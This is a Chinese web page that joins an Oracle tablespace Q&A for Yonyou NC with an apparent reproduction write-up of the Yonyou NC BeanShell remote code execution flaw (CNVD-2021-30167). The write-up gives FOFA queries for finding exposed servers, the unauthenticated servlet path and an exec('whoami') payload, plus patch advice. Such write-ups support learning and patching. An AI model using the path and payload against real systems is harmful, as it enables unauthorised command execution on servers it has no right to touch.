用友nc5.7 linux 中oracle创建表空间问题

Posted 2023-05-02

我在oracle中创建了一个用户和6个必要的表空间，并还原了数据库软件里创建了帐套

我还需要再创建一个帐套，是否需要在创建一个用户和6个相同名称的表空间（如果需要表空间名称是
重复的会有问题吗）

参考技术A 只需另建一个用户即可，表空间可以共用，前提是这几个表空间空间在装下第一个帐套后还有足够的空间可以使用，不然要给不够的表空间增加数据文件来扩大表空间

CNVD-2021-30167用友NC BeanShell 漏洞复现（CNVD-2021-30167）

文章目录

• • • 漏洞名称
    • 漏洞介绍
    • 漏洞编号
    • 漏洞描述
    • 影响版本
    • FOFA
    • 漏洞点
    • 漏洞复现
    • 修复建议
    • 补丁地址：
    • 免责声明
    • 摘抄

漏洞名称

• 用友NC BeanShell远程代码执行漏洞

漏洞介绍

• 用友NC采用J2EE架构，面向大型企业集团和成长中的集团企业的信息化需求，为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
• 2021年6月2日，用友公司发布了关于用友NC BeanShell远程代码执行漏洞的风险通告。

漏洞编号

• CNVD-2021-30167
  

漏洞描述

• 由于用友NC对外开放了BeanShell的测试接口，未经身份验证的攻击者利用该测试接口，
• 通过向目标服务器发送恶意构造的Http请求，在目标系统上直接执行任意代码，从而获得目标服务器权限。

影响版本

• 用友NC6.5版本

FOFA

title=="YONYOU NC"
app="用友-UFIDA-NC"

漏洞点

http://ip/servlet/~ic/bsh.servlet.BshServlet
exec("whoami");

漏洞复现

https://1x.1x.xx.xx:8443/servlet/~ic/bsh.servlet.BshServlet

修复建议

由于该漏洞的出现是因第三方jar包的漏洞导致，用友NC官方已发布相关的安全补丁，使用该产品的用户需要及时安装该漏洞补丁包

补丁地址：

http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19

免责声明

本文档供学习，请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责！

摘抄

大雨中为你撑伞的人，黑暗中默默抱紧你的人，

逗你笑的人，陪你彻夜聊天的人，

坐车来看你的人，在医院陪你的人，

陪你哭过的人，总是以你为重的人，

是这些温暖使你成为善良的人。